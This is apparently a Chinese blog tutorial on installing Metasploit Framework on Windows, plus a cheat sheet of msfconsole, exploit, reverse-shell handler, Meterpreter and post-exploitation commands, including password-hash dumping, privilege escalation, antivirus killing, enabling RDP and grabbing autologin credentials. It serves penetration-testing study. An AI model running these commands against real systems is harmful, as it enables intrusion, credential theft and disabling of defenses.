Windows 系统部署 Metasploit Framework

2022-11-02 15:03:33 浏览数 (1)

前言

Kali Linux 系统中已经自带 Metasploit 渗透框架就不过多介绍了。本文主要介绍如何在 Windows 系统环境下安装部署 Metasploit 渗透框架。

0x01 工具简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。Metasploit是少数几个可用于执行诸多渗透测试步骤的工具,其社区拥有超过200000名成员,是全球最大的信息安全交流社区。当前社区成员及Rapid7核心研发团队每天都在更新Metasploit功能框架,不断完善,来给渗透测试从业者更优的使用体验。

Windows版本安装包

  • 官网下载地址:https://windows.metasploit.com/metasploitframework-latest.msi
  • 百度云备份地址:https://pan.baidu.com/s/19pc4depNN-930A43gk5PNg 提取码: kd0t

0x02 工具安装

下载安装包到本地,直接点击安装即可

记住本地安装的路径,安装完成后添加系统环境变量

打开Windows cmd命令行输入 msfconsole 即可启动 Metasploit

0x03 工具使用

MSF常用参数命令:

  • reload_all #从目录重载所有模块
  • back #后退命令,移出当前上下文,用于模块切换
  • info #目标和模块详细信息
  • check #检查目标是否受某个漏洞影响
  • sessions #会话管理
  • sessions -l #列出所有会话
  • sessions -K #终止所有会话
  • sessions -i id #进入某个会话
  • sessions -v #以详细模式列出会话
  • sessions -u #在许多平台上将shell升级到meterpreter会话
  • show options #显示可选选项;

MSF漏洞利用步骤:

  • search xxx #搜索某个漏洞
  • use xxx #使用某个漏洞利用模块
  • show options #查看配置选项
  • set payload #配置攻击载荷
  • exploit/run #执行渗透攻击

MSF监听反弹shell:

  • msf6 > use exploit/multi/handler
  • msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
  • msf6 exploit(multi/handler) > set LHOST 0.0.0.0
  • msf6 exploit(multi/handler) > set LPORT 4444
  • msf6 exploit(multi/handler) > run

Meterpreter命令:

  • pwd、ls、cd、ps、cat #通用命令
  • background #将当前meterpreter会话隐藏在后台sessions中
  • getpid #查看当前Meterpreter Shell的进程号
  • getuid #查看当前权限
  • migrate 476 #将shell迁移到PID为786的进程中
  • getsystem #获得系统管理员权限(要本地管理员权限运行)
  • hashdump #抓哈希密码
  • sysinfo #查看系统信息
  • route #查看目标机完整网络设置
  • shell #进入目标机shell,exit退出shell
  • upload ./1.txt c:1.txt #上传文件
  • download c:1.txt ./ #下载文件
  • search -f *.txt -d c:// #搜索文件

MSF后渗透命令:

  • run post/windows/gather/checkvm #查看目标是否允许在虚拟机
  • run post/windows/manage/killav #关闭杀毒软件
  • run post/windows/manage/enable_rdp #开启3389远程桌面
  • run post/windows/manage/autoroute #查看目标子网情况
  • run post/windows/gather/enum_logged_on_users #列举当前有多少用户登录过目标主机
  • run post/windows/gather/credentials/windows_autologin #抓取自动登录的用户名密码
  • run post/windows/gather/enum_applications #列举应用程序

0 人点赞